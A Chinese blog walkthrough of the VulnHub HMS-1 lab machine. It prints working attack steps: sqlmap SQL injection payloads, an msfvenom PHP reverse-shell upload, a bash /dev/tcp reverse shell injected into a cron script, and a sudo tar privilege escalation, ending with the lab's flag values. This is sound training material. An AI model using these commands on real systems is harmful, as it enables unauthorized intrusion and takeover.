首页 > 其他分享 >『vulnhub系列』HMS-1

『vulnhub系列』HMS-1

时间:2024-06-04 16:12:01浏览次数:12  
标签:系列 -- 199.133 192.168 HMS admin vulnhub login eren

『vulnhub系列』HMS?-1

下载地址:

https://www.vulnhub.com/entry/hms-1,728/

信息搜集:

使用nmap进行存活主机探测,发现开启了21端口(ftp)和22端口(ssh)

匿名登录ftp看看里面有什么东西,发现什么都没有

ftp 192.168.199.133
#使用anonymous登录,无需输入密码

进行全面扫描,发现开启了7080端口

nmap 192.168.199.133 -p 1-65535

访问7080端口的服务发现存在一个登录页面

使用dirsearch进行目录扫描

dirsearch -u "http://192.168.199.133:7080/"

在登录页面查看是否存在sql注入,发现确实存在,一个报错注入一个盲注

sqlmsqlmap -u http://192.168.199.133:7080/login.php --data="user=admin&email=admin%40123&password=asd&btn_login="

查看数据库

sqlmap -u http://192.168.199.133:7080/login.php --data="user=admin&email=admin%40123&password=asd&btn_login=" --dbs

查看数据库中的表

sqlmap -u http://192.168.199.133:7080/login.php --data="user=admin&email=admin%40123&password=asd&btn_login=" -D 'clinic_db' --tables

查看admin表中的字段,发现邮箱为 [email protected] ,但是我们发现密码并不是明文

sqlmap -u http://192.168.199.133:7080/login.php --data="user=admin&email=admin%40123&password=asd&btn_login=" -D 'clinic_db' -T 'admin' --dump

漏洞利用:

我们之前发现,是存在报错注入的并且看payload是通过单引号闭合的

 Payload: user=admin&email=admin@123' OR (SELECT 9709 FROM(SELECT COUNT(*),CONCAT(0x7170707671,(SELECT (ELT(9709=9709,1))),0x716b706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nnPx&password=asd&btn_login=

我们使用万能密码发现带有前端验证

我们使用burp抓包,使用Repeater确认一下,发现Login Successfully

user=admin&email=ndbhalerao91%40gmail.com' or 1=1 #&password=asd&btn_login=

我们放包,登录成功

找了半天,没有发现什么地方可疑,我们再使用另一个工具扫描一下目录,因为并没有登录,所以这些302的跳转页面,其实也是存在的

gobuster dir -u "http://192.168.199.133:7080/" -w /usr/share/wordlists/dirb/big.txt -x .php

我们发现了setting页面,存在文件上传页面。上传使用msfvenom 生成的反弹shell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.199.129 lport=4444 -o re_shell.php

然后发现上面出现了一串图片

新标签页访问,发现新的目录/uploadImage

最后在/uploadImage/Logo/ 中发现我们的re_shell.php

此时在我们的攻击机开启监听

msfconsole
use exploit/multi/handler
set lhost 192.168.199.133
set payload php/meterpreter/reverse_tcp
run

反弹成功

提升权限:

查看具有SUID权限的命令,发现/usr/bin/bash我们可以借此切换用户

find / -perm -u=s -type f 2>/dev/null

使用命令,成功切换为eren 用户

/usr/bin/bash -p

但是使用命令sudo -l发现还是要输入密码,因此此时我们的eren用户的权限并不完整

我们查看计划任务

cat /etc/crontab

发现一条计划任务*/5 * * * * eren /home/eren/backup.sh

关于计划任务:
*  *  *  *  *
分 时 日 月 周
而对于这条命令意思就是每五分钟执行一次
*/5 * * * * eren /home/eren//backup.sh

可以看到这个文件正好早eren的家目录下。那么我们刚刚切换为eren用户的操作就可以用到了,使用eren权限我们将反弹shell写入/backup.sh

 echo "bash -i >& /dev/tcp/192.168.199.129/7777 0>&1" >> /home/eren/backup.sh

之后在攻击机使用nc等待

nc -lvp 7777

连接成功,获得完整的eren用户权限

使用命令sudo -l 查看用户可以在机器上运行的命令,发现tar命令可以以root权限执行

现在我们使用tar的sudo提权

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
  • -cf /dev/null /dev/null 将/dev/null 打包为 /dev/null
  • -c 打包
  • -f 打包为f后面的名字
  • --checkpoint=1 每打包一个文件就到达一个检查点
  • --checkpoint-action=exec=/bin/sh 到达检查点后执行的命令

获得root权限

成果:

/home/nivek/local.txt

3bbf8c168408f1d5ff9dfd91fc00d0c1

/root/root.txt

299c10117c1940f21b70a391ca125c5d

标签:系列,--,199.133,192.168,HMS,admin,vulnhub,login,eren
From: https://www.cnblogs.com/obeto/p/18231023

相关文章

  • Stratix® V FPGA系列:5SGXEBBR3H43I3G、5SGXEBBR1H43C2G、5SGXEBBR2H43I2G为带宽应用
    StratixV系列StratixVFPGA采用新的存储器体系结构,降低延时,高效实现FPGA业界最好的系统性能。StratixVFPGA为网络设备生产商提供存储器接口解决方案,支持在互联网上迅速有效的传送视频、语音和数据。StratixVFPGA的主要性能突破包括:集成66个28Gbps串行收发器(每通道功耗仅20......
  • 转子动力学系列(一):临界转速与坎贝尔图
    转子动力学为固体力学的分支。主要研究转子-支承系统在旋转状态下的振动、平衡和稳定性问题,尤其是研究接近或超过临界转速运转状态下转子的横向振动问题。转子是涡轮机、电机等旋转式机械中的主要旋转部件。运动方程为:1.例子如图刚性支撑单圆盘转子,圆盘质量m=20kg,半径R=1......
  • 铁威马T系列NAS企业优季:办公利器,六折钜惠来袭!
    众所周知,现如今企业对于数据存储和管理的需求日益增长,为满足广大企业用户的实际需求,恰逢6.18,铁威马特别推出T系列NAS(网络附加存储)企业特惠季活动,以低至六折的优惠价格,让您轻松拥有高效、稳定的办公利器。一、铁威马T系列NAS:性能卓越,稳定可靠铁威马T系列NAS以其出色的性能和稳定......
  • 前端工程化工具系列(六)—— VS Code(v1.89.1):强大的代码编辑器
    VSCode(VisualStudioCode)是一款由微软开发的强大且轻量级的代码编辑器,支持多种编程语言,并提供了丰富的扩展插件生态系统。这里主要介绍如何使用配置ESLint、Stylelint等插件来提升开发效率。1自动格式化代码最终要达到的效果是:在对文件保存时自动格式化Vue、JS/TS......
  • STM32系列--串口收发+基本定时器
      if(myusart.reflag>0){Com_Handle();myusart.recount=0;myusart.reflag=0;}main #define_maxbuf100typedefstruct{u8myadd;u8......
  • Python数据分析【Numpy系列】np.linspace()用法详解
    np.linspace()是NumPy库中一个非常有用的函数,它用于在指定的区间内生成等间距的样本值。这个函数非常适合在数值分析、数据可视化和信号处理等领域生成数据点。函数语法numpy.linspace(start,stop,num=50,endpoint=True,retstep=False,dtype=None,axis=0)......
  • tomcat系列漏洞利用
    Tomcat服务器是一个开源的轻量级Web应用服务器,在中小型系统和并发量小的场合下被普遍使用。主要组件:服务器Server,服务Service,连接器Connector、容器Container。连接器Connector和容器Container是Tomcat的核心。一个Container容器和一个或多个Connector组合在一起,加上其他一些......
  • python系列&AI系列:Python Traceback指南:异常代码排错利器
    PythonTraceback指南:异常代码排错利器PythonTraceback指南:异常代码排错利器TracebackTraceback示例Traceback包含的信息自定义TracebackTraceback的用处`Traceback`的应用示例总结PythonTraceback指南:异常代码排错利器当在Python中遇到错误时,Traceback(回溯)......
  • 模拟集成电路设计系列博客——6.3.2 单电源正输出转换器
    6.3.2单电源正输出转换器一个快速单端正极输出D/A(一般用于视频RAM中,称为RAMDAC)如下图所示[Colles,1988]:此处,一个匹配反馈回路被用于精确已知的电流源偏置(注意,此处放大器的输入连接看上去是反的,但是由于信号通过\(Q_4\)反相,因此这样连接才是对的)。同时,为了保持独立于\(V_{out}......
  • enum4linux一键查询SMB信息(KALI工具系列十六)
    目录1、KALILINUX简介 2、enum4linux工具简介 3、在KALI中使用enum4linux3.1目标主机IP(win)​编辑3.2KALI的IP  4、操作示例4.1运行工具 4.2列出用户名4.3提取用户名4.4使用自定义RID范围4.5列出组4.6列出共享文件夹4.7获取操作系统信息5、总结......